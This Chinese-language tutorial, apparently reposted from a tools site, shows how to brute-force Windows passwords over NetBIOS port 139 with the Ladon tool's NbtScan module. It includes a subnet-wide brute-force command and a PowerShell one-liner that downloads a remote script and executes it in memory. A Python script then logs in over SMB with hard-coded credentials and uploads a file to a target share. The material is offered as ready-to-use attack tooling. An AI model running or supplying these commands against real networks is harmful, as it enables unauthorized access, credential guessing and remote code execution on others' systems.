1. 程式人生 > 實用技巧 >〖教程〗NbtScan 139埠弱口令/Netbios密碼爆破

〖教程〗NbtScan 139埠弱口令/Netbios密碼爆破

版本

Ladon >= 7.1

139埠

NetBIOS File and Print Sharing 通過這個埠進入的連線試圖獲得NetBIOS/SMB服務。這個協議被用於Windows"檔案和印表機共享"和SAMBA。

IPC$通訊

Windows系統中的net use ipc\(整個通訊過程,先445->137->139驗證,當你開啟防火牆禁用445,發現系統命令就無法連線IPC了,根本沒機會走到139,所以使用系統自帶命令連線的ipc\)需要同時開啟這些埠。說入侵139就是IPC\(的說法是錯誤的,就像說wmiexec.vbs可完全替代PSEXEC工具一樣,這個指令碼需要目標開啟135和445,因為它通過445來傳輸結果,意味著目標只開放135這個VBS的回顯就沒有了,其實假設目標只開放445,這個VBS指令碼還能執行命令嗎?哪來的替代或扔掉?這個系統的IPC\)

連線也是同理,測試首先得把其它埠禁了再說話。雖然系統自帶命令需要同時開啟,但是 自己實現SMB伺服器的話是可以只使用139或只用445埠的,詳情參考impacket。

Nbt爆破

系統自帶命令需要同時開啟139和445,但是 自己實現SMB伺服器的話是可以只使用139或只用445埠的。系統的IPC\(就像讀取系統密碼一樣,可以先植入CS再用MIMI外掛讀取,但是我們也可以不使用CS,直接MIMI讀取密碼啊。基於和MIMI可以獨立讀取密碼的原理,反向思路我們也可以完全不走445,直接通過139驗證WINDOWS密碼,所以這個和IPC\)不一樣(指的是系統命令連線的ipc),所以為了防止大家誤解,起名為NbtScan。畢竟走的也是Netbios,系統IPC$驗證一是時間非常久,且必須開啟445,如果445都開了為何不用SmbScan驗證密碼呢?但是由於近幾年勒索病毒橫行,可能很多機器預設會關閉445,所以會導致無法通過445驗證密碼,但是沒關係還有139啊。

Ladon

139埠 Netbios密碼爆破(Windows)

Ladon 192.168.1.8/24 NbtScan

PowerLadon

遠端載入NbtScan 139埠弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon7.1_all.ps1'); Ladon 192.168.1.141 NbtScan"

139傳輸檔案


#!/usr/bin/env python
#coding:utf-8

from smb.SMBConnection import SMBConnection
from nmb.NetBIOS import NetBIOS
import os,sys
def getBIOSName(remote_smb_ip, timeout=30):
    try:
        bios = NetBIOS()
        srv_name = bios.queryIPForName(remote_smb_ip, timeout=timeout)
    except:
        print >> sys.stderr, "Looking up timeout, check remote_smb_ip again!!"
    finally:
        bios.close()
        return srv_name
serverip='192.168.1.40'
conn = SMBConnection('k8gege', 'k8gege520', 'C$',getBIOSName(serverip)[0], use_ntlm_v2 = True) 
assert conn.connect(serverip, 139)
#temdir='/'
#dir=os.path.join('/','public')
f = open('C:/123.txt', 'rb')
conn.storeFile('Users','234.txt',f)
f.close()

工具下載

最新版本:https://k8gege.org/Download
歷史版本: https://github.com/k8gege/Ladon/releases